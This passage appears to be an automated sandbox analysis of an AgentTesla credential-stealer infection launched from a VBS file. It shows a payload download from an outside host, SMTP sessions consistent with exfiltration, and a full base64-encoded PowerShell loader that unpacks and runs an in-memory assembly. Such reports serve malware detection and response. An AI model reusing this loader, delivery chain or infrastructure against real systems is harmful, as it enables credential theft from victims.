2024-09-02 05:48:42 UTC	85	OUT	GET /AW/DH/Dvkuvug.dat HTTP/1.1 Host: etehadshipping.com Connection: Keep-Alive
2024-09-02 05:48:42 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Sat, 31 Aug 2024 00:19:53 GMT accept-ranges: bytes content-length: 958976 date: Mon, 02 Sep 2024 05:48:42 GMT
2024-09-02 05:48:42 UTC	16384	IN	Data Raw: 7a 62 a3 37 3b 33 37 38 37 37 38 33 c8 c7 33 37 80 33 37 38 33 37 38 33 77 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 37 38 33 b7 38 33 37 36 2c 8d 36 33 83 31 fe 16 80 32 7b f5 12 63 50 5a 44 18 43 45 57 54 45 59 5e 17 5b 52 59 56 5c 43 18 51 52 18 41 42 56 13 5e 56 13 73 77 60 17 55 5c 53 5d 1d 3a 35 39 13 38 33 37 38 33 37 38 63 72 38 33 7b 39 30 37 c5 97 d0 f7 33 37 38 33 37 38 33 37 d8 33 39 19 38 36 08 33 37 a2 3d 37 38 35 37 38 33 37 38 33 89 80 3d 37 38 13 37 38 33 f7 36 33 37 38 73 37 38 13 37 38 33 35 38 33 33 38 33 37 38 33 37 38 37 37 38 33 37 38 33 37 38 33 38 38 33 35 38 33 37 38 33 37 3b 33 77 bd 33 37 28 33 37 28 33 37 38 33 27 38 33 27 38 33 37 38 33 37 37 33 37 38 33 37 38 33 37 38 33 Data Ascii: zb7;3787783373783783w837837837837837837837837837837837838376,6312{cPZDCEWTEY^[RYV\CQRABV^Vsw`U\S]:598378378cr83{90737837837398637=785783783=787836378s787835833837837877837837838835837837;3w37(37(3783'83'83783773783783783
2024-09-02 05:48:42 UTC	16384	IN	Data Raw: 3a 32 37 38 c2 33 38 33 0f 38 33 37 2f 33 37 39 33 37 38 33 06 38 33 37 a4 36 37 38 fe 32 38 33 0e 38 33 37 2f 33 37 39 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 24 08 30 37 b8 33 37 38 32 37 38 22 1f 4f 30 37 3e 13 36 38 33 37 c6 3d 37 38 0b 37 38 33 37 c6 3f 37 38 76 34 38 33 37 17 33 37 38 36 37 38 33 19 38 33 37 00 19 37 38 33 49 9f 31 37 3c 1b 96 30 33 31 18 33 37 38 33 49 07 31 37 3c 48 43 3a 33 33 02 ff c8 c7 cc 11 18 33 37 38 33 0f f9 cc c8 c7 19 49 90 31 37 3c 1b 92 30 33 31 18 32 37 38 33 49 07 31 37 3c 48 0f 3a 33 33 02 91 c8 c7 cc 11 18 31 37 38 33 0f af cc c8 c7 21 37 38 27 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 23 12 33 37 38 21 37 38 27 1d 38 33 37 2a 33 37 Data Ascii: :278383837/3793783837678283837/379 ;338378378378$07378278"O07>6837=787837?78v48373786783837783I17<0313783I17<HC:333783I17<0312783I17<H:331783!78'83737,783%83#378!78'83737,783%83#378!78'837*37
2024-09-02 05:48:42 UTC	16384	IN	Data Raw: cc 0f 97 cc c8 c7 13 29 38 33 37 00 6d cb c7 cc 26 1e 22 26 29 38 26 24 1b 8a 3b 33 31 18 31 37 38 33 1f f6 30 37 3e 0a 75 c4 cc c8 1e 13 21 38 33 37 00 04 cb c7 cc 26 29 22 3d 10 9d 34 38 35 17 3a 33 37 38 0b 13 c4 cc c8 00 b1 ca c7 cc 17 39 33 37 38 1b f8 3b 33 31 01 23 cb c7 cc 11 18 32 37 38 33 0f 3d cf c8 c7 22 3b 29 2a 0b 6f 32 37 38 13 3d 38 33 37 00 c1 cc c7 cc 26 1e 22 26 18 ab 37 38 33 26 24 1b 8a 3b 33 31 18 3a 37 38 33 1f f7 30 37 3e 09 e4 c3 cc c8 1e 13 1e 38 33 37 00 fb cc c7 cc 26 3d 1b f0 3b 33 31 18 38 37 38 33 0f 8f c8 c8 c7 0b bf c6 cc c8 18 1f 37 38 33 c9 36 14 37 00 93 cc c7 cc 26 29 16 1f f9 30 37 3e 22 20 56 6b 1f 96 30 37 3e 13 3e 38 33 37 10 fd 34 38 35 0e bc c8 c8 c7 15 17 12 33 37 38 0b 4e c3 cc c8 29 25 1f fa 30 37 3e 20 13 18 Data Ascii: )837m&"&)8&$;31178307>u!837&)"=485:3789378;31#2783=";)*o278=837&"&783&$;31:78307>837&=;31878378367&)07>" Vk07>>837485378N)%07>
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 11 e8 cc c8 c6 3f 28 38 13 22 38 33 37 18 0e 37 38 33 17 5d 33 37 38 6b ab 18 7e 37 38 33 1f 13 37 37 3e 0a 35 e8 cc c8 1e 13 0b 38 33 37 00 c4 f8 c7 cc 26 09 25 1f e9 30 37 3e 15 17 b4 33 37 38 0b d3 f7 cc c8 29 35 17 c9 c1 c4 cc 73 5b d1 cc c8 18 00 35 38 33 c9 36 43 37 00 f5 f8 c7 cc 49 51 32 37 3c 1b 2b 3c 33 31 10 16 33 38 35 1f 1e 37 37 3e 13 b4 39 33 37 10 18 33 38 35 0e 9f fc c8 c7 15 17 5c 32 37 38 0b ab f7 cc c8 c6 3f 28 38 13 24 38 33 37 c6 3f 24 38 af 17 ad 33 37 38 0b b3 f7 cc c8 c6 3f 28 38 13 3d 38 33 37 c6 3f 51 38 af 17 5f 33 37 38 cd 39 48 33 0f 5c fc c8 c7 21 1c d8 40 a7 38 33 3d 2e 1b e4 3b 33 31 1e 13 13 38 33 37 00 7c f8 c7 cc 0f 1b ca c8 c7 13 26 38 33 37 c6 3d 47 38 0b 0f f7 cc c8 18 da 37 38 33 17 75 33 37 38 6a c9 36 0a 37 18 2d Data Ascii: ?(8"837783]378k~78377>5837&%07>378)5s[5836C7IQ27<+<3138577>937385\278?(8$837?$8378?(8=837?Q8_3789H3\!@83=.;31837\|&837=G8783u378j67-
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 38 39 1d 38 09 c9 31 33 37 c6 3a 36 38 5c 3a 39 33 3d 12 33 1d c6 3a 37 38 5c 67 3c 33 31 12 33 0d c6 3a 37 38 cd 3e 39 33 58 2f 33 37 32 19 37 12 cd 3e 38 33 58 c2 33 37 32 19 37 02 cd 3e 38 33 c9 31 32 37 57 62 33 38 35 1d 38 1d 37 c6 3a 37 38 1b 52 39 33 3d 12 19 c9 31 33 37 57 c4 37 38 39 1d 38 19 c9 31 33 37 57 55 36 38 39 1d 38 7d 37 c6 3a 37 38 cd 3e 39 33 c9 31 31 37 10 4f 36 38 39 1d 12 cd 3e 38 33 58 45 32 37 32 19 37 16 33 c9 31 33 37 10 4d 36 38 39 1d 12 cd 3e 38 33 58 67 32 37 32 19 37 12 cd 3e 38 33 58 2d 33 37 32 19 37 12 cd 3e 38 33 58 6b 37 37 3e 19 37 26 33 1f 5f 30 37 3e 19 0d c6 3a 37 38 cd 3e 39 33 58 5f 32 37 32 19 37 72 cd 3e 38 33 c9 31 32 37 c6 3a 35 38 5c dd 38 33 3d 12 33 6d c6 3a 37 38 cd 3e 39 33 c9 31 31 37 c6 3a 34 38 5c 08 Data Ascii: 898137:68\:93=3:78\g<313:78>93X/3727>83X3727>83127Wb38587:78R93=137W7898137WU6898}7:78>93117O689>83XE27273137M689>83Xg2727>83X-3727>83Xk77>7&3_07>:78>93X_2727r>83127:58\83=3m:78>93117:48\
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 0b df fe cc c8 c6 3f 34 38 13 27 38 33 37 c6 3f 3d 38 af 17 6f 33 37 38 1b af 3c 33 31 02 f8 f1 c7 cc 11 18 f8 37 38 33 0f f8 f5 c8 c7 cd 3b 3b 33 17 39 33 37 38 13 6c 38 33 37 18 0c 37 38 33 6e a4 13 ab 38 33 37 10 a4 33 38 35 0d a4 f5 c8 c7 15 17 68 33 37 38 0b a6 fe cc c8 29 31 24 28 13 18 39 33 37 00 b0 f1 c7 cc c9 34 30 37 18 3c 37 38 33 17 cd 33 37 38 13 66 38 33 37 61 af 17 77 32 37 38 0b 53 fe cc c8 c6 3f 11 38 13 33 38 33 37 c6 3f 31 38 af 17 5c 33 37 38 0b 7b fe cc c8 18 da 37 38 33 17 75 33 37 38 6a c9 36 39 37 18 54 37 38 33 1f a0 37 37 3e 0a 19 fe cc c8 1e 13 22 38 33 37 00 10 f1 c7 cc c9 34 30 37 18 3b 37 38 33 c9 34 39 37 a4 13 12 38 33 37 00 38 f1 c7 cc c9 34 15 37 18 31 37 38 33 c9 34 35 37 a4 13 40 38 33 37 00 c0 f2 c7 cc 17 2c 33 37 38 Data Ascii: ?48'837?=8o378<31783;;39378l837783n837385h378)1$(937407<783378f837aw278S?83837?18\378{783u378j697T78377>"837407;7834978378471783457@837,378
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 37 38 33 37 38 33 37 12 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 25 38 33 37 12 33 37 38 21 37 38 33 1d 38 33 37 2a 33 37 38 19 37 38 33 25 38 33 37 12 33 37 38 20 07 3b 33 33 38 33 37 38 33 37 38 33 37 38 19 24 08 37 37 3c 33 37 38 33 37 38 33 37 38 33 1d 2b 03 33 38 37 37 38 33 37 38 33 37 38 33 37 12 21 37 38 27 1d 38 33 37 2b 03 34 38 5d 37 38 33 36 38 33 26 10 44 34 38 35 17 39 33 37 38 cd 39 38 33 0f 38 33 37 38 cd 3b 38 33 72 3b 33 37 38 36 37 38 33 11 38 33 37 1d 33 37 38 0b 37 38 33 37 46 9b 35 38 37 1f 9d 3b 37 3e 13 37 38 33 37 2f 0a e2 c7 cc c8 1e 13 35 38 33 37 00 f9 c8 c7 cc 1d 46 94 35 38 37 1f 99 3b 37 3e 13 37 38 33 37 2f 09 83 c7 cc c8 1e 13 37 38 33 37 00 9a c8 c7 cc 37 38 21 37 38 24 1d 38 33 37 2a 33 37 2c 19 37 38 33 25 38 33 Data Ascii: 7837837 ;338378378378%837378!783837378783%837378 ;338378378378$77<3783783783+3877837837837!78'837+48]783683&D48593789838378;83r;37867838373787837F587;7>7837/5837F587;7>7837/783778!78$83737,783%83
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 0b 33 e7 16 83 36 0b 33 ec 16 83 36 0b 33 d1 16 83 36 0b 33 c6 16 83 36 0b 33 cb 16 83 36 0b 33 30 17 83 36 0b 33 25 17 83 36 0b 33 2a 17 83 36 0b 33 1f 17 83 36 0b 33 04 17 83 36 0b 33 09 17 83 36 0b 33 7e 17 83 36 0b 33 63 17 83 36 0b 33 68 17 83 36 0b 33 5d 17 83 36 0b 33 42 17 83 36 0b 33 b7 17 83 36 0b 33 bc 17 83 36 0b 33 a1 17 83 36 0b 33 96 17 83 36 0b 33 9b 17 83 36 2b 33 80 17 83 36 29 33 3d 0d 83 36 29 33 48 03 0c 3f 29 33 9c 03 77 3f 2b 33 e0 03 7a 3f 39 33 8a 04 85 3f 39 33 ff 04 88 3f 39 33 e4 04 f3 3f 29 33 e9 04 83 36 39 33 4a 05 cd 3f 39 33 bf 05 32 3e 39 33 a4 05 cd 3f 39 33 a9 05 36 3e 39 33 9e 05 9e 36 39 33 83 05 9e 36 39 33 88 05 9e 36 39 33 fd 05 9e 36 39 33 e2 05 af 36 2b 33 d7 05 83 36 39 33 72 07 af 36 39 33 67 07 cd 3f 39 33 6c Data Ascii: 36363636363063%63*63636363~63c63h63]63B63636363636+36)3=6)3H?)3w?+3z?93?93?93?)3693J?932>93?936>936936936936936+3693r693g?93l
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 31 35 f7 31 9b 49 33 37 30 33 a4 38 59 44 4c 3d f8 3a 87 46 38 33 3f 38 a0 37 46 40 35 3a fc 35 84 42 37 38 3b 37 ab 33 a5 4b 31 35 f7 31 f3 49 33 37 30 33 a4 38 95 44 09 3b f8 3a ff 46 38 33 3f 38 a0 37 82 40 2b 2b fc 35 ec 42 37 38 3b 37 ab 33 f9 4b 2f 35 f7 31 eb 49 33 37 30 33 a4 38 c4 44 4e 31 f8 3a d7 46 38 33 3f 38 a0 37 2c 47 5d 3a fc 35 d4 42 37 38 3b 37 ab 33 75 4c f8 30 f7 31 c3 49 33 37 30 33 a4 38 65 43 81 32 f8 3a cf 46 38 33 3f 38 a0 37 52 47 35 3a fc 35 3c 41 37 38 3b 37 ab 33 49 4c 8a 36 f7 31 3b 4a 33 37 30 33 a4 38 a1 43 4e 31 f8 3a 27 45 38 33 3f 38 a0 37 9e 47 96 2c fc 35 18 41 37 38 3b 37 ab 33 e1 4c 31 35 f7 31 1f 4a 33 37 30 33 a4 38 d9 43 ba 32 f8 3a 03 45 38 33 3f 38 a0 37 c6 47 b5 39 fc 35 00 41 37 38 3b 37 ab 33 25 4d b1 36 f7 Data Ascii: 151I37038YDL=:F83?87F@5:5B78;73K151I37038D;:F83?87@++5B78;73K/51I37038DN1:F83?87,G]:5B78;73uL01I37038eC2:F83?87RG5:5<A78;73IL61;J37038CN1:'E83?87G,5A78;73L151J37038C2:E83?87G95A78;73%M6
2024-09-02 05:48:43 UTC	16384	IN	Data Raw: 1b aa 32 37 30 33 a6 38 15 87 2e 2e 76 3d 0f a5 39 33 3f 38 a2 37 09 83 13 35 71 32 58 a1 36 38 3b 37 a9 33 0b 88 31 35 7b 36 93 aa 32 37 30 33 a6 38 74 87 e0 10 73 3d e3 a5 39 33 3f 38 a2 37 62 83 d0 1b 74 32 d8 a1 36 38 3b 37 be 2b 70 38 9c 37 72 36 c7 aa 32 37 30 33 a6 20 3c 10 ba 32 7d 3d 17 a2 39 33 3f 38 a0 37 53 83 bd 39 79 32 14 a6 36 38 3b 37 ab 33 48 88 dd 14 72 36 03 ad 32 37 30 33 a4 38 a0 87 81 32 7d 3d 0f a2 39 33 3f 38 a0 37 9f 83 35 3a 79 32 7c a6 36 38 3b 37 ab 33 8c 88 7c 2e 72 36 7b ad 32 37 30 33 a4 38 fc 87 c6 2b 7d 3d 67 a2 39 33 3f 38 a0 37 db 83 c9 20 79 32 64 a6 36 38 3b 37 ab 33 c0 88 45 35 72 36 53 ad 32 37 30 33 a4 38 38 86 ae 3b 7d 3d 43 a2 39 33 3f 38 a0 37 27 82 f0 3a 78 32 40 a6 36 38 3b 37 ab 33 04 89 31 35 73 36 b7 ad 32 Data Ascii: 27038..v=93?875q2X68;7315{627038ts=93?87bt268;7+p87r62703 <2}=93?87S9y268;73Hr6270382}=93?875:y2\|68;73\|.r6{27038+}=g93?87 y2d68;73E5r6S270388;}=C93?87':x2@68;7315s62

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 2, 2024 07:48:19.228571892 CEST	587	49709	173.254.28.210	192.168.2.8	220-just2016.justhost.com ESMTP Exim 4.96.2 #2 Sun, 01 Sep 2024 23:48:19 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 2, 2024 07:48:19.239900112 CEST	49709	587	192.168.2.8	173.254.28.210	EHLO 965543
Sep 2, 2024 07:48:19.388793945 CEST	587	49709	173.254.28.210	192.168.2.8	250-just2016.justhost.com Hello 965543 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Sep 2, 2024 07:48:19.390918016 CEST	49709	587	192.168.2.8	173.254.28.210	STARTTLS
Sep 2, 2024 07:48:19.541775942 CEST	587	49709	173.254.28.210	192.168.2.8	220 TLS go ahead
Sep 2, 2024 07:48:41.298819065 CEST	587	49713	173.254.28.210	192.168.2.8	220-just2016.justhost.com ESMTP Exim 4.96.2 #2 Sun, 01 Sep 2024 23:48:41 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 2, 2024 07:48:41.299866915 CEST	49713	587	192.168.2.8	173.254.28.210	EHLO 965543
Sep 2, 2024 07:48:41.449321985 CEST	587	49713	173.254.28.210	192.168.2.8	250-just2016.justhost.com Hello 965543 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Sep 2, 2024 07:48:41.449620008 CEST	49713	587	192.168.2.8	173.254.28.210	STARTTLS
Sep 2, 2024 07:48:41.598928928 CEST	587	49713	173.254.28.210	192.168.2.8	220 TLS go ahead
Sep 2, 2024 07:48:47.980976105 CEST	587	49716	173.254.28.210	192.168.2.8	220-just2016.justhost.com ESMTP Exim 4.96.2 #2 Sun, 01 Sep 2024 23:48:47 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 2, 2024 07:48:47.981287003 CEST	49716	587	192.168.2.8	173.254.28.210	EHLO 965543
Sep 2, 2024 07:48:48.127228022 CEST	587	49716	173.254.28.210	192.168.2.8	250-just2016.justhost.com Hello 965543 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Sep 2, 2024 07:48:48.127403975 CEST	49716	587	192.168.2.8	173.254.28.210	STARTTLS
Sep 2, 2024 07:48:48.274234056 CEST	587	49716	173.254.28.210	192.168.2.8	220 TLS go ahead

Target ID:	0
Start time:	01:47:57
Start date:	02/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs"
Imagebase:	0x7ff6fe0f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:47:58
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y
Imagebase:	0x7ff6e3ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:47:58
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:48:00
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Imagebase:	0x110000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1623969561.0000000008E80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:48:00
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:48:15
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xe60000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1790656213.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1790656213.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:48:26
Start date:	02/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs"
Imagebase:	0x7ff6fe0f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:48:26
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y
Imagebase:	0x7ff6e3ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:48:26
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:48:29
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc 